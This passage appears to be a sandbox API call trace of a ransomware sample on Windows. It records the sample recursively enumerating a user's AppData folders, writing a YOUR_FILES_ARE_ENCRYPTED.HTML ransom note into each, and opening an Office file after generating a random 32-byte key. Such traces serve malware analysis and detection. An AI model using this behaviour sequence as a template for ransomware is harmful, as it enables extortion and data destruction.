ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fe83ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0111.233] StrStrIW (lpFirst="11_All_Pictures.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.233] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\11_All_Pictures.wpl") returned 112 [0111.233] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0111.233] lstrlenW (lpString=".wpl") returned 4 [0111.233] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0111.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fe83ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fe83ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fe83ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0111.233] StrStrIW (lpFirst="12_All_Video.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.233] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\12_All_Video.wpl") returned 109 [0111.233] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0111.233] lstrlenW (lpString=".wpl") returned 4 [0111.233] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0111.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fe83ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fe83ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fe83ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 0 [0111.234] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0111.234] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0111.234] GetProcessHeap () returned 0x600000 [0111.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30e81b0 [0111.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00007f03\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0111.236] WriteFile (in: hFile=0x308, lpBuffer=0x30e81b0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x30e81b0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0111.236] CloseHandle (hObject=0x308) returned 1 [0111.237] GetProcessHeap () returned 0x600000 [0111.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30e81b0 | out: hHeap=0x600000) returned 1 [0111.237] GetProcessHeap () returned 0x600000 [0111.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0111.238] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fe83ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fe83ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="00007F03", cAlternateFileName="")) returned 0 [0111.238] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.238] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0111.238] GetProcessHeap () returned 0x600000 [0111.238] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.239] WriteFile (in: hFile=0x310, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.240] CloseHandle (hObject=0x310) returned 1 [0111.240] GetProcessHeap () returned 0x600000 [0111.240] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.240] GetProcessHeap () returned 0x600000 [0111.240] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.242] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="en-US", cAlternateFileName="")) returned 0 [0111.242] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0111.242] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0111.242] GetProcessHeap () returned 0x600000 [0111.242] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\media player\\sync playlists\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.243] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.244] CloseHandle (hObject=0x31c) returned 1 [0111.244] GetProcessHeap () returned 0x600000 [0111.244] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.244] GetProcessHeap () returned 0x600000 [0111.244] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.245] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x760d4d6f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x760d4d6f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x760d4d6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 1 [0111.245] StrStrIW (lpFirst="Transcoded Files Cache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.245] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned 85 [0111.245] GetProcessHeap () returned 0x600000 [0111.245] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.246] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" [0111.246] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*" [0111.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x760d4d6f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x760d4d6f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x760d4d6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.246] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x760d4d6f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x760d4d6f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x760d4d6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0111.246] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x760d4d6f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x760d4d6f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x760d4d6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0111.247] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.247] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0111.247] GetProcessHeap () returned 0x600000 [0111.247] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\media player\\transcoded files cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.247] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.248] CloseHandle (hObject=0x31c) returned 1 [0111.249] GetProcessHeap () returned 0x600000 [0111.249] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.249] GetProcessHeap () returned 0x600000 [0111.249] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.249] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x760d4d6f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x760d4d6f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x760d4d6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 0 [0111.249] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.250] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0111.250] GetProcessHeap () returned 0x600000 [0111.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.252] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.253] CloseHandle (hObject=0x320) returned 1 [0111.253] GetProcessHeap () returned 0x600000 [0111.253] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.253] GetProcessHeap () returned 0x600000 [0111.253] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.254] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x696efe32, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x696efe32, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Office", cAlternateFileName="")) returned 1 [0111.254] StrStrIW (lpFirst="Office", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.254] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office") returned 56 [0111.254] GetProcessHeap () returned 0x600000 [0111.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.255] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office" [0111.256] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\*" [0111.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x696efe32, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x696efe32, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626838 [0111.256] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x696efe32, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x696efe32, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.256] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x3b96fdbf, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3b96fdbf, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="16.0", cAlternateFileName="")) returned 1 [0111.256] StrStrIW (lpFirst="16.0", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.256] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0") returned 61 [0111.256] GetProcessHeap () returned 0x600000 [0111.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.257] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0" [0111.257] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\*" [0111.257] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x3b96fdbf, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3b96fdbf, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0111.257] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x3b96fdbf, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3b96fdbf, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="..", cAlternateFileName="")) returned 1 [0111.257] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaba9333c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaba9333c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaba946d1, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x139be, dwReserved0=0x60f652, dwReserved1=0x60f5e0, cFileName="excel.exe_Rules.xml", cAlternateFileName="EXCELE~1.XML")) returned 1 [0111.257] StrStrIW (lpFirst="excel.exe_Rules.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.257] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml") returned 81 [0111.257] PathFindExtensionW (pszPath="excel.exe_Rules.xml") returned=".xml" [0111.257] lstrlenW (lpString=".xml") returned 4 [0111.257] PathFindExtensionW (pszPath="excel.exe_Rules.xml") returned=".xml" [0111.257] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0111.258] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=80318) returned 1 [0111.258] GetProcessHeap () returned 0x600000 [0111.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.260] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="EA") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="75") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="FA") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="45") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="4E") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="9F") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D8") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="5C") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="90") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="9C") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="1A") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="42") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="02") returned 2 [0111.260] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="FF") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="E9") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="83") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="AC") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D6") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="01") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="AA") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="1E") returned 2 [0111.261] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="8A") returned 2 [0111.261] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="9D") returned 2 [0111.261] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C0") returned 2 [0111.261] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="35") returned 2 [0111.261] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="57") returned 2 [0111.261] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="28") returned 2 [0111.261] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="0E") returned 2 [0111.261] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="CC") returned 2 [0111.261] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="08") returned 2 [0111.261] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="7E") returned 2 [0111.261] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="24") returned 2 [0111.262] lstrcpyW (in: lpString1=0x30b00fc, 